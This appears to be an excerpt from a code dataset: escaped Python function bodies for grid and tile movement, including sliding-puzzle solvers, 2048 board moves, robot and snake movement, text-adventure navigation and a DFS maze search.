Maximize((grid,0),-999999999,999999999)[0]\n Child = child.map\n g = grid.clone()\n for M in range(4):\n if g.move(M):\n if g.map == Child:\n # global prune\n # global pruneLog\n # pruneLog.append(prune)\n # print(prune)\n # print(sum(pruneLog)/len(pruneLog))\n return M\n g = grid.clone()\n\n self.dict = {}\n self.h = {}\n self.prevTime = time.clock()\n self.depthLimit = 1\n self.mL = []\n self.over = False\n while self.over == False:\n self.depthLimit +=1\n try :\n self.mL.append(decision(grid))\n\n except KeyError:\n# print(self.depthLimit)\n return self.mL[-1]\n except IndexError:\n return random.randint(0,3)\n self.Alarm(time.clock())\n return self.mL[-1]", "def solve_interior_tile(self, target_row, target_col):\r\n whole_move = ''\r\n # replace with your code\r\n if self._grid[target_row][target_col] != 0:\r\n # print \"DEBUG CASE WHEN ZERO IN JOPA\"\r\n \r\n # print self\r\n # print 'Solwing tile', self._grid[target_row][target_col]\r\n \r\n # print 'Searchind indexes of ZERO'\r\n for row in self._grid:\r\n for col in row:\r\n if col == 0:\r\n zero_row, zero_col = self._grid.index(row), row.index(col)\r\n break\r\n # print 'ZERO indexes=', (zero_row, zero_col)\r\n #####Moving zero to correct place\r\n #path_down = (target_row - zero_row) * 'd'\r\n #path_left = (zero_col - target_col) * 'l'\r\n if target_col - zero_col > 0:\r\n #path_right = (target_col - zero_col) * 'r'\r\n path_of_zero = (zero_col - target_col) * 'l' + (target_row - zero_row) * 'd' + (target_col - zero_col) * 'r'\r\n else:\r\n path_of_zero = (zero_col - target_col) * 'l' + (target_row - zero_row) * 'd'\r\n zero_col -= len(filter(lambda x: x=='l', path_of_zero))\r\n zero_col += len(filter(lambda x: x=='r', path_of_zero))\r\n zero_row += len(filter(lambda x: x=='d', path_of_zero))\r\n self.update_puzzle(path_of_zero)\r\n # print 'Grid after moving ZERO to target spot'\r\n # print self\r\n whole_move += path_of_zero\r\n assert self.lower_row_invariant(target_row, target_col), \"Invarian is False\"\r\n \r\n #current_position = self.current_position(target_row, target_col)\r\n #current_row, current_col = self.current_position(target_row, target_col)\r\n # print 'Target tile position=',current_position\r\n # print 'Target tile value=', self._grid[current_position[0]][current_position[1]]\r\n # print '0 position=', (target_row, target_col)\r\n \r\n ######Moving zero tile to the target tile\r\n path_up = (target_row - self.current_position(target_row, target_col)[0]) * 'u'\r\n zero_row = target_row - len(path_up)\r\n if target_col < self.current_position(target_row, target_col)[1]: # Right move\r\n path_side = (self.current_position(target_row, target_col)[1] - target_col) * 'r'\r\n zero_col = target_col + len(path_side)\r\n else: # Left move\r\n path_side = (target_col - self.current_position(target_row, target_col)[1]) * 'l'\r\n zero_col = target_col - len(path_side)\r\n \r\n #path_for_zero = path_up + path_side\r\n # print '------------------------------------------'\r\n # print 'Move to ZERO =', path_for_zero\r\n \r\n self.update_puzzle(path_up + path_side)\r\n \r\n # print 'Grid after move:'\r\n # print self\r\n # current_position = self.current_position(target_row, target_col) \r\n # current_row, current_col = current_position\r\n # print 'Updated Target tile position=',current_position\r\n # print 'Updated 0 position=', (zero_row, zero_col)\r\n # print 'Target position =', (target_row, target_col)\r\n # print '-----------------------------------------'\r\n \r\n\r\n ###### New moves after moving ZERO tile into target tile\r\n # counter = 0\r\n whole_move += path_up + path_side\r\n while self.current_position(target_row, target_col) != \\\r\n (target_row, target_col) or zero_col != target_col - 1:\r\n # tt_in_home = self.current_position(target_row, target_col) == \\\r\n # (target_row, target_col)\r\n\r\n cyclic_moves = ''\r\n # counter += 1\r\n #current_position = self.current_position(target_row, target_col) \r\n #current_col = self.current_position(target_row, target_col)[1]\r\n # print 'Zero coloumn', zero_col, '== Target coloumn', target_col\r\n # print zero_col == target_col \r\n \r\n #### Case 1 if ZERO located in ther right of\r\n #### target tile (after it)\r\n if zero_col > self.current_position(target_row, target_col)[1]:\r\n # print ' Look in the up puzzle, zero on the right side'\r\n # if self.current_position(target_row, target_col)[1] != target_col:\r\n # # print 'not under target place'\r\n # cyclic_moves = 'dllur'\r\n # zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n # zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n if self.current_position(target_row, target_col)[1] == target_col and self._grid[zero_row+1][zero_col] < \\\r\n self._grid[self.current_position(target_row, target_col)[0]][self.current_position(target_row, target_col)[1]]:\r\n # print 'Tile tat is under ZERO is',self._grid[zero_row+1][zero_col] \r\n # print 'TT under target place'\r\n cyclic_moves = 'dlu'\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n #zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n # elif self._grid[zero_row+1][zero_col] > \\\r\n # self._grid[self.current_position(target_row, target_col)[0]][self.current_position(target_row, target_col)[1]]:\r\n # # print 'Tile under zero is illegal to move and we use upper cycle move '\r\n \r\n # cyclic_moves = 'ul'\r\n # zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n # zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n\r\n #### Case 2 if ZERO located under the target tile, and both\r\n #### of them located under the target position of the target tile\r\n elif zero_col == self.current_position(target_row, target_col)[1] and zero_col == target_col:\r\n # print 'Both under the target place'\r\n # print 'TT in home=', tt_in_home\r\n if self.current_position(target_row, target_col) == \\\r\n (target_row, target_col):\r\n cyclic_moves = 'ld'\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n #zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n \r\n else:\r\n cyclic_moves = 'lddru'\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n \r\n #### Case 3 if ZERO located in the left side of the target tile\r\n ### like in the owel-test case\r\n elif zero_col < self.current_position(target_row, target_col)[1]:\r\n # print 'ZERO tile located in the left side'\r\n if self.current_position(target_row, target_col)[1] != target_col:\r\n # print 'not under the target place'\r\n cyclic_moves = 'drrul'\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n elif self.current_position(target_row, target_col)[1] == target_col:\r\n # print 'Target tile under target place'\r\n cyclic_moves = 'dru'\r\n #zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n\r\n\r\n # print 'Puzzle after Maded move:', cyclic_moves\r\n self.update_puzzle(cyclic_moves)\r\n # print 'Zero at home=', 'Zero col', zero_col, '== Target col - 1 is', target_col - 1\r\n # print self\r\n # print 'Loot counter =',counter\r\n whole_move += cyclic_moves\r\n # if counter > 12:\r\n # break\r\n # print 'Tile is solved with move '+ whole_move\r\n assert self.lower_row_invariant(target_row, target_col-1), \"Invarian is False\"\r\n return whole_move", "def move_robot(room, direction):\r\n\r\n robot_row, robot_col = robot_location(room)\r\n\r\n intended_row = robot_row\r\n intended_col = robot_col\r\n\r\n if direction == \"right\":\r\n intended_col = robot_col + 1\r\n elif direction == \"left\":\r\n intended_col = robot_col - 1\r\n elif direction == \"up\":\r\n intended_row = robot_row - 1\r\n elif direction == \"down\":\r\n intended_row = robot_row + 1\r\n\r\n if room[intended_row][intended_col] != \"obstacle\":\r\n room[intended_row][intended_col] = \"robot\"\r\n room[robot_row][robot_col] = \"empty\"\r\n\r\n return room", "def solve_puzzle(self):\r\n # initialize some values and start tile at bottom right corner\r\n col = self.get_width() - 1\r\n row = self.get_height() - 1\r\n move = \"\"\r\n curr_row, curr_col = self.current_position(0, 0)\r\n move_to_target = abs(curr_col - col) * \"r\" + abs(curr_row - row) * \"d\"\r\n self.update_puzzle(move_to_target)\r\n move += move_to_target\r\n\r\n # apply solver methods\r\n for dummy_i in range(row, 1, -1):\r\n for dummy_j in range(col, 0, -1):\r\n move += self.solve_interior_tile(dummy_i, dummy_j)\r\n move += self.solve_col0_tile(dummy_i)\r\n \r\n for dummy_j in range(col, 1, -1):\r\n move += self.solve_row1_tile(dummy_j)\r\n move += self.solve_row0_tile(dummy_j)\r\n \r\n move += self.solve_2x2()\r\n return move", "def move_tile(self, target_row, target_col, val):\n # a little bit twisted here for the use of both solve_interior_tile and solve_col0_tile\n solved_row, solved_col = self.current_position(0, val)\n movements = \"\"\n if solved_row == target_row and solved_col == target_col:\n return \"\"\n if solved_row == target_row:\n if target_col > solved_col:\n movements = \"l\" * (target_col - solved_col) + \"urrdl\" * (\n target_col - solved_col - 1)\n else:\n movements = \"r\" * (solved_col - target_col) + \"ulldr\" * (\n solved_col - target_col - 1) + \"ulld\"\n elif solved_col == target_col:\n movements = \"u\" * (target_row - solved_row) + \"lddru\" * (\n target_row - solved_row - 1) + \"ld\"\n elif solved_col < target_col:\n if solved_col == 0:\n movements = \"l\" * (target_col - solved_col) + \"u\" * (\n target_row - solved_row) + \"rddlu\" * (\n target_row - solved_row - 1) + \"rdl\" + \"urrdl\" * (\n target_col - solved_col - 1)\n else:\n movements = \"l\" * (target_col - solved_col) + \"u\" * (\n target_row - solved_row) + \"lddru\" * (\n target_row - solved_row - 1) + \"rdl\" + \"urrdl\" * (\n target_col - solved_col - 1)\n elif solved_col > target_col:\n if solved_row == 0:\n movements = \"u\" * (target_row - solved_row) + \"r\" * (\n solved_col - target_col) + \"dllur\" * (\n solved_col - target_col - 1) + \"dlu\" + \"lddru\" * (\n target_row - solved_row - 1) + \"ld\"\n else:\n movements = \"u\" * (target_row - solved_row) + \"r\" * (\n solved_col - target_col) + \"ulldr\" * (\n solved_col - target_col - 1) + \"ullddru\" + \"lddru\" * (\n target_row - solved_row - 1) + \"ld\"\n return movements", "def execute_go(direction):\r\n global current_room\r\n if is_valid_exit(current_room[\"exits\"], direction):\r\n current_room = move(current_room[\"exits\"], direction)\r\n print_room(current_room)\r\n global valid_move\r\n valid_move = True\r\n else:\r\n wrap_print(\"You cannot go there\")", "def try_move_player(self):\n player = self.player\n if player.direction == 'U':\n next_position = (player.position[0], player.position[1] - 1)\n elif player.direction == 'D':\n next_position = (player.position[0], player.position[1] + 1)\n elif player.direction == 'L':\n next_position = (player.position[0] - 1, player.position[1])\n elif player.direction == 'R':\n next_position = (player.position[0] + 1, player.position[1])\n\n if self.__is_valid_position(next_position):\n self.player.position = next_position\n else:\n self.game_over = True", "def solve_puzzle(self):\n # move zero tile to the lower right corner\n row, col = self.current_position(0, 0)\n movements = \"d\" * (self.get_height() - 1 - row) + \"r\" * (\n self.get_width() - 1 - col)\n self.update_puzzle(movements)\n # solve rowid from 2 by row\n for row in range(self.get_height() - 1, 1, -1):\n for col in range(self.get_width() - 1, -1, -1):\n assert self.lower_row_invariant(row, col)\n if col == 0:\n movements += self.solve_col0_tile(row)\n assert self.lower_row_invariant(row - 1,\n self.get_width() - 1)\n else:\n movements += self.solve_interior_tile(row, col)\n assert self.lower_row_invariant(row, col - 1)\n # solve the uppermost two rows by column\n for col in range(self.get_width() - 1, 1, -1):\n for row in range(1, -1, -1):\n if row == 0:\n assert self.row0_invariant(col)\n movements += self.solve_row0_tile(col)\n assert self.row1_invariant(col - 1)\n else:\n assert self.row1_invariant(col)\n movements += self.solve_row1_tile(col)\n assert self.row0_invariant(col)\n movements += self.solve_2x2()\n return movements", "def Recharge_Method1(r, c): \n robot = NIL\n if state.loc[r] != state.pos[c] and state.pos[c] != r:\n if state.pos[c] in rv.LOCATIONS:\n alg.do_task('moveTo', r, state.pos[c])\n else:\n robot = state.pos[c]\n alg.do_command(put, robot, c)\n alg.do_task('moveTo', r, state.pos[c])\n alg.do_command(charge, r, c)\n if robot != NIL:\n alg.do_command(take, robot, c)", "def update(self):\n # Move left/right=====\n self.rect.x += self.change_x\n self.rect.y += self.change_y\n visited[int(self.rect.x/32)][int(self.rect.y/32)].append(self.id)\n\n self.path.append((int(self.rect.x/32), int(self.rect.y/32)))\n\n # if(self.rect.x == goal_x) & (self.rect.y == goal_y):\n # pygame.quit()\n # sys.exit(0)\n\n self.change_x = 0\n self.change_y = 0", "def makeMove(self, movable_statement):\n ### Student code goes here\n tile = movable_statement.terms[0].term.element\n initialX = movable_statement.terms[1].term.element\n initialY = movable_statement.terms[2].term.element\n goalX = movable_statement.terms[3].term.element\n goalY = movable_statement.terms[4].term.element\n r1 = parse_input(\"fact: (on \" + tile + \" \" + initialX + \" \" + initialY + \")\")\n self.kb.kb_retract(r1)\n r2 = parse_input(\"fact: (on empty \" + goalX + \" \" + goalY + \")\")\n self.kb.kb_retract(r2)\n stat1 = parse_input(\"fact: (on \" + tile + \" \" + goalX + \" \" + goalY + \")\")\n self.kb.kb_assert(stat1)\n stat2 = parse_input(\"fact: (on empty \" + initialX + \" \" + initialY + \")\")\n self.kb.kb_assert(stat2)\n\n\n #for facts in self.kb.facts:\n # print(facts.statement)\n\n #print(\"\\n\\n\")\n ##Need to handle adjacentTo\n '''ask = parse_input(\"fact: (adjacentTo empty ?tile)\")\n answer = self.kb.kb_ask(ask)\n empty_adj = []\n if answer:\n for ans in answer.list_of_bindings:\n adjTile = ans[0].bindings[0].constant.element\n if adjTile != tile:\n rt = parse_input(\"fact: (adjacentTo empty \" + adjTile + \")\")\n self.kb.kb_retract(rt)\n #print(\"RMOVINGGGG\")\n #print(rt)\n rt1 = parse_input(\"fact: (adjacentTo \" + adjTile + \" empty)\")\n self.kb.kb_retract(rt1)\n empty_adj.append(adjTile) #All of empty's adjacent tiles'''\n\n #for facts in self.kb.facts:\n # print(facts.statement)\n\n #print(\"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\")\n '''ask1 = parse_input(\"fact: (adjacentTo \" + tile + \" ?tile)\")\n answer1 = self.kb.kb_ask(ask1)\n if answer1:\n for ans in answer1.list_of_bindings:\n adjTile = ans[0].bindings[0].constant.element\n if adjTile != \"empty\":\n stat = parse_input(\"fact: (adjacentTo empty \" + adjTile + \")\")\n self.kb.kb_assert(stat)\n radj1 = parse_input(\"fact: (adjacentTo \" + tile + \" \" + adjTile + \")\")\n self.kb.kb_retract(radj1)\n radj2 = parse_input(\"fact: (adjacentTo \" + adjTile + \" \" + tile + \")\")\n self.kb.kb_retract(radj2)\n for tiles in empty_adj:\n stat = parse_input(\"fact: (adjacentTo \" + tile + \" \" + tiles + \")\")\n self.kb.kb_assert(stat)'''", "def move(self, direction):\n newx = self.x\n newy = self.y\n newy += random.randint(-1, 1)\n newx += random.randint(-1, 1)\n if self.tmap.contents[newy][newx] != '#':\n self.x = newx\n self.y = newy", "def move(self, direction):\r\n direc = list(OFFSETS[direction])\r\n line = []\r\n dummy_board = self.board[:]\r\n if direction == 3:\r\n for i in range(self.height):\r\n self.board[i] = merge(self.board[i])\r\n self.compare(dummy_board)\r\n return self.board\r\n \r\n elif direction == 4:\r\n for i in range(self.height):\r\n line = self.board[i][::-1]\r\n self.board[i] = merge(line)\r\n self.board[i] = self.board[i][::-1]\r\n self.compare(dummy_board)\r\n return self.board\r\n \r\n \r\n elif direction == 1 or 2:\r\n dummy_board = str(self.board[:])\r\n if direction == 1:\r\n tile = [0,0]\r\n elif direction == 2:\r\n tile = [self.height - 1, 0]\r\n for i in range(self.width):\r\n tile2 = tile[:]\r\n while len(line) < self.height:\r\n line.append(self.get_tile(*tile2))\r\n tile2 = [x+y for x,y in zip(direc, tile2)]\r\n line = merge(line)\r\n tile2 = tile[:]\r\n for i in range(self.height):\r\n self.set_tile(*(tile2+[line[0]]))\r\n line.remove(line[0])\r\n tile2 = [x+y for x,y in zip(direc, tile2)]\r\n tile = [x+y for x,y in zip(tile, [0,1])]\r\n if dummy_board != self.__str__():\r\n self.new_tile()\r\n return self.board", "def move_pawn(pos, game):\n #Convert coordinates to row and column\n row = int(pos[1]//(SQUARESIZE+FENCEWIDTH))\n col = int(pos[0]//(SQUARESIZE+FENCEWIDTH))\n #Make move\n game.move_pawn(game.get_player_turn(), (col,row))", "def move(self):\n\n x, y = self.position\n\n if self.in_spawn_area:\n if 0 <= x < MAP_SIZE and 0 <= y < MAP_SIZE:\n self.in_spawn_area = False\n\n preferred_direction = self.get_preferred_direction()\n\n if preferred_direction == (0, 0):\n return\n\n new_tiles = self.calculate_tiles_ahead(preferred_direction)\n\n if self.can_advance(new_tiles, preferred_direction):\n self.position = self.position[0] + preferred_direction[0] * 2, self.position[1] + preferred_direction[1] * 2\n self.update_cache_after_move(preferred_direction, new_tiles)\n self.previous_direction = preferred_direction[:]", "def move(self):\n \"\"\" Responsible for transformations \"\"\"\n pos, com, success = self.perception \n if self.destination is None:\n return array([0,0])\n\n if not self.awake:\n return array([0,0])\n\n\n if self.phase == 4 and self.proper_formation is not None:\n no_go = []\n for i in range(0,len(self.proper_formation)):\n if i != self.order and self.proper_formation[i][0] == self.proper_formation[self.order][0]:\n no_go.append(self.transform(self.proper_formation[i][1] - self.position))\n pos = merge_array_lists(pos, no_go)\n\n if self.phase == 2:\n point = self.destination.copy() - self.position\n elif self.phase > 2:\n point = self.transform(self.destination.copy() - self.position)\n else:\n point = self.destination.copy()\n\n if not array_equal(point, array([0,0])):\n reachable, path = findpathtoclosest(array([0,0]), point, pos)\n \n if len(path) == 0:\n move = array([0,0]) \n else:\n move = path[0]\n if not reachable and not array_equal(move,array([0,0])):\n if self.phase == 2:\n self.closest_i_could_get = path[-1] + self.position\n elif self.phase > 2:\n self.closest_i_could_get = self.transform2(path[-1]) + self.position\n else:\n self.closest_i_could_get = path[-1]\n elif not reachable:\n if self.phase > 1:\n self.closest_i_could_get = self.position\n else:\n self.closest_i_could_get = array([0,0])\n else:\n self.closest_i_could_get = None\n\n if reachable and self.phase == 4 and array_equal(move,array([0,0])):\n move = self.randomStep()\n self.closest_i_could_get = None\n\n else:\n move = array([0,0])\n self.closest_i_could_get = None\n\n return move", "def move(puzzle: str, direction: str):\r\n position_index = puzzle.index(EMPTY)\r\n position = position_index + 1\r\n grid_width = get_grid_width(puzzle)\r\n\r\n # What direction to moved the tile if it's a valid move\r\n if direction == UP:\r\n if (position) > grid_width:\r\n return swap_position(puzzle, position_index, position_index - grid_width)\r\n\r\n elif direction == DOWN:\r\n if (len(puzzle) - position) >= grid_width:\r\n return swap_position(puzzle, position_index, position_index + grid_width)\r\n\r\n elif direction == LEFT:\r\n if (position - 1) % grid_width != 0:\r\n return swap_position(puzzle, position_index, position_index - 1)\r\n\r\n elif direction == RIGHT:\r\n if position % grid_width != 0:\r\n return swap_position(puzzle, position_index, position_index + 1)\r\n\r\n return None", "def move_to_location(cardinal_point):\r\n\r\n\ttry:\r\n\r\n\t\told_room = config[\"GAMEDATA\"][\"CURRENTZONE\"]\r\n\t\tnew_room = world.WORLD_ROOMS[old_room][cardinal_point]\r\n\t\t\r\n\t\tif new_room == None:\r\n\t\t\ttprint(\"You cannot go there.\")\r\n\t\t\treturn\r\n\r\n\t\t\r\n\t\tnew_room_name = getstring(world.WORLD_ROOMS[new_room][\"NAME\"])\r\n\t\t\r\n\t\tdebug(\"new_room = \" + str(new_room))\r\n\t\tdebug(\"new_room_name = \" + str(new_room_name))\r\n\r\n\t\tif world.WORLD_ROOMS[new_room][\"NEEDITEM\"] != None: # If an item is required to go there...\r\n\t\t\tcurrent_inventory = config[\"GAMEDATA\"][\"INVENTORY\"]\r\n\t\t\tneeded_item_id = world.WORLD_ITEMS[world.WORLD_ROOMS[new_room][\"NEEDITEM\"]][\"ID\"]\r\n\t\t\tneeded_item_name = world.WORLD_ITEMS[world.WORLD_ROOMS[new_room][\"NEEDITEM\"]][\"NAME\"]\r\n\t\t\t\r\n\t\t\tif current_inventory == None:\r\n\t\t\t\ttprint(\"You do not have the required item in your inventory,\")\r\n\t\t\t\ttprint(\"You need to have '\" + needed_item_name + \"'\")\r\n\t\t\t\treturn\r\n\t\t\t\t\r\n\t\t\telse: # Inventory isn't blank\r\n\t\t\t\tfor item_id in current_inventory:\r\n\t\t\t\t\tif item_id == needed_item_id: # If the player have the needed item in his inventory...\r\n\t\t\t\t\t\ttprint(\"You entered by using \" + needed_item_name)\r\n\t\t\t\t\t\ttprint(\"you are now at : \" + new_room_name)\r\n\t\t\t\t\t\tconfig[\"GAMEDATA\"][\"CURRENTZONE\"] = new_room\r\n\t\t\t\t\t\treturn # Exits the function\r\n\t\t\t\t\t\r\n\t\t\t\t# If we arrive here, this means that the player doesn't have the needed item.\r\n\t\t\t\ttprint(\"You do not have the required item in your inventory,\")\r\n\t\t\t\ttprint(\"You need to have '\" + needed_item_name + \"'\")\r\n\t\t\t\treturn\r\n\t\t\t\r\n\t\telse: # The room doesn't requires an item...\r\n\t\t\tconfig[\"GAMEDATA\"][\"CURRENTZONE\"] = new_room\r\n\t\t\ttprint(\"You are now at : \" + new_room_name)\r\n\t\t\treturn\r\n\t\r\n\texcept Exception as error: # If we arrive here, this means that there is a bug in there, oops.\r\n\t\tprint(\"ERROR! in function move_to_location() try block raised an exception !\")\r\n\t\tprint(str(error))\r\n\t\ttraceback.print_exc()\r\n\t\treturn", "def move(self):\r\n if self.d == 'NORTH' and (self.y + 1) <= table_max_y:\r\n self.y += 1\r\n elif self.d == 'EAST' and (self.x + 1) <= table_max_x:\r\n self.x += 1\r\n elif self.d == 'SOUTH' and (self.y - 1) >= 0:\r\n self.y -= 1\r\n elif self.d == 'WEST' and (self.x - 1) >= 0:\r\n self.x -= 1\r\n else:\r\n print(\"Edge of Table Reached!\")", "def solve_puzzle(self):\n cur0_row, cur0_col = self.current_position(0, 0)\n move_str = 'd' * (self._height - cur0_row - 1) + 'r' * (self._width - cur0_col - 1)\n self.update_puzzle(move_str)\n for row in range(self._height-1, 1, -1):\n for col in range(self._width-1, -1, -1):\n assert self.lower_row_invariant(row, col)\n if col != 0:\n move_str += self.solve_interior_tile(row, col)\n else:\n move_str += self.solve_col0_tile(row)\n for col in range(self._width-1, 1, -1):\n assert self.row1_invariant(col)\n move_str += self.solve_row1_tile(col)\n assert self.row0_invariant(col)\n move_str += self.solve_row0_tile(col)\n move_str += self.solve_2x2()\n return move_str", "def dfs(game, game_coords):\n # *** the main stack to record steps ***\n stack_moves = [[game.player.row, game.player.col]]\n\n # record path and illegal moves\n route = []\n declined_moves = []\n\n # met fire and no water on hand\n met_fire = False\n\n # keep looping until reaching end point\n while stack_moves[-1] != game_coords['Y'][0]:\n # main stack popped in last turn\n go_back = False\n\n # struggled more than three turns\n if len(route) > 3 and route[-1] == 3 and route[-2] == 3 and route[-3] == 3:\n return 0, 0, 0\n\n player_coords = [game.player.row, game.player.col]\n\n # try the first possible move: left, down, right, up, teleport, go back(pop)\n if left(player_coords) not in stack_moves and left(player_coords) not in declined_moves:\n will_move = left(player_coords)\n action = 1\n\n elif down(player_coords) not in stack_moves and down(player_coords) not in declined_moves:\n will_move = down(player_coords)\n action = 2\n\n elif right(player_coords) not in stack_moves and right(player_coords) not in declined_moves:\n will_move = right(player_coords)\n action = -1\n\n elif up(player_coords) not in stack_moves and up(player_coords) not in declined_moves:\n will_move = up(player_coords)\n action = -2\n\n elif search_coords(game_coords, stack_moves[-1]) in ['1', '2', '3', '4', '5', '6', '7', '8', '9']:\n # teleport from current location\n action = 3\n will_move = stack_moves[-1]\n\n else:\n # pop the last element in main stack\n declined_moves.append(stack_moves.pop())\n\n # back upon start point, loss!\n if not stack_moves:\n return 0, 0, 0\n\n # go back\n will_move = stack_moves[-1]\n action = -route[-1]\n go_back = True\n\n # check if move is legal\n item = search_coords(game_coords, will_move)\n\n if item == '*' or item == -1:\n declined_moves.append(will_move)\n continue\n elif item == 'W':\n game.player.num_water_buckets += 1\n if met_fire:\n # can put out fire now, therefore, seeking path using a fresh mind :)\n stack_moves = []\n declined_moves = []\n met_fire = False\n\n for i in range(len(game_coords['W'])):\n # water picked up, set current display from 'W' to ' ' in game_coords\n if game_coords['W'][i] == will_move:\n game_coords['W'].pop(i)\n game_coords[' '].append(will_move)\n break\n elif item == 'F':\n if game.player.num_water_buckets < 1:\n # cannot put out fire, refuse this move :(\n declined_moves.append(will_move)\n met_fire = True\n continue\n game.player.num_water_buckets -= 1\n elif item in ['1', '2', '3', '4', '5', '6', '7', '8', '9']:\n for coords in game_coords[item]:\n if coords != will_move:\n will_move = coords\n break\n\n # *** append to main stack ***\n if not go_back:\n stack_moves.append(will_move)\n\n # *** move the player ***\n game.player.row = will_move[0]\n game.player.col = will_move[1]\n\n route.append(action)\n\n action_map = {1: 'a', 2: 's', -1: 'd', -2: 'w', 3: 'e'}\n\n # translate action to string of cmd\n trace = ''\n for action in route:\n trace += action_map[action] + ', '\n\n return 1, len(route), trace", "def move(self, direction):\n # replace with your code\n\n indices = self.direction_indices[direction]\n for coordinate in indices:\n merged_coordinate_list = self.get_list(direction, coordinate)\n self.change_board(merged_coordinate_list, coordinate, direction)\n print(self.__str__())\n if self.board_is_not_full():\n self.new_tile()", "def locateRobot(self):\n logging.info(\"Display Carte : {}\".format(self.name))\n for r, row in enumerate(self.map):\n #print(row)\n for c, cell in enumerate(row):\n if (cell == \"X\"):\n logging.info(\"r={} / c={}\".format(r, c))\n self.robot.posX = c\n self.robot.posY = r", "def move(self, direction: str) -> int:\n (i, j), _ = self.position.popitem(last=True) # current position\n self.position[(i, j)] = 0 # add back \n if direction == \"U\": i -= 1\n elif direction == \"L\": j -= 1\n elif direction == \"R\": j += 1\n else: i += 1\n if self.food and self.food[0] == [i, j]: self.food.popleft()\n else: self.position.popitem(last=False)\n if not (0 <= i < self.height and 0 <= j < self.width) or (i, j) in self.position: return -1 # game over \n self.position[(i, j)] = 0\n return len(self.position)-1", "def _move(self, direction, difference):\n future_tile_number = self.get_number() + difference\n if future_tile_number in range(1, Tile.total_tiles + 1):\n future_tile = Tile.get_tile(future_tile_number)\n if future_tile.walkable:\n self.set_target(future_tile)\n self.rotate(direction)", "def update_puzzle(self, move_string):\r\n zero_row, zero_col = self.current_position(0, 0)\r\n for direction in move_string:\r\n if direction == \"l\":\r\n assert zero_col > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\r\n self._grid[zero_row][zero_col - 1] = 0\r\n zero_col -= 1\r\n elif direction == \"r\":\r\n assert zero_col < self._width - 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\r\n self._grid[zero_row][zero_col + 1] = 0\r\n zero_col += 1\r\n elif direction == \"u\":\r\n assert zero_row > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\r\n self._grid[zero_row - 1][zero_col] = 0\r\n zero_row -= 1\r\n elif direction == \"d\":\r\n assert zero_row < self._height - 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\r\n self._grid[zero_row + 1][zero_col] = 0\r\n zero_row += 1\r\n else:\r\n assert False, \"invalid direction: \" + direction", "def update_puzzle(self, move_string):\r\n zero_row, zero_col = self.current_position(0, 0)\r\n for direction in move_string:\r\n if direction == \"l\":\r\n assert zero_col > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\r\n self._grid[zero_row][zero_col - 1] = 0\r\n zero_col -= 1\r\n elif direction == \"r\":\r\n assert zero_col < self._width - 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\r\n self._grid[zero_row][zero_col + 1] = 0\r\n zero_col += 1\r\n elif direction == \"u\":\r\n assert zero_row > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\r\n self._grid[zero_row - 1][zero_col] = 0\r\n zero_row -= 1\r\n elif direction == \"d\":\r\n assert zero_row < self._height - 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\r\n self._grid[zero_row + 1][zero_col] = 0\r\n zero_row += 1\r\n else:\r\n assert False, \"invalid direction: \" + direction", "def update_puzzle(self, move_string):\r\n zero_row, zero_col = self.current_position(0, 0)\r\n for direction in move_string:\r\n if direction == \"l\":\r\n assert zero_col > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\r\n self._grid[zero_row][zero_col - 1] = 0\r\n zero_col -= 1\r\n elif direction == \"r\":\r\n assert zero_col < self._width - 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\r\n self._grid[zero_row][zero_col + 1] = 0\r\n zero_col += 1\r\n elif direction == \"u\":\r\n assert zero_row > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\r\n self._grid[zero_row - 1][zero_col] = 0\r\n zero_row -= 1\r\n elif direction == \"d\":\r\n assert zero_row < self._height - 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\r\n self._grid[zero_row + 1][zero_col] = 0\r\n zero_row += 1\r\n else:\r\n assert False, \"invalid direction: \" + direction", "def move(self):\n \n self.position = self.explore()", "def computer_move(self):\n tree = LinkedBinaryTree(self)\n self.create_tree(tree)\n left_points = self._calculate_points(tree.get_left_child())\n right_points = self._calculate_points(tree.get_right_child())\n\n if left_points < right_points:\n next_board = tree.get_right_child().key\n else:\n next_board = tree.get_left_child().key\n self.board = next_board.board", "def update_puzzle(self, move_string):\n zero_row, zero_col = self.current_position(0, 0)\n for direction in move_string:\n if direction == \"l\":\n assert zero_col > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col\n - 1]\n self._grid[zero_row][zero_col - 1] = 0\n zero_col -= 1\n elif direction == \"r\":\n assert zero_col < self._width - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col\n + 1]\n 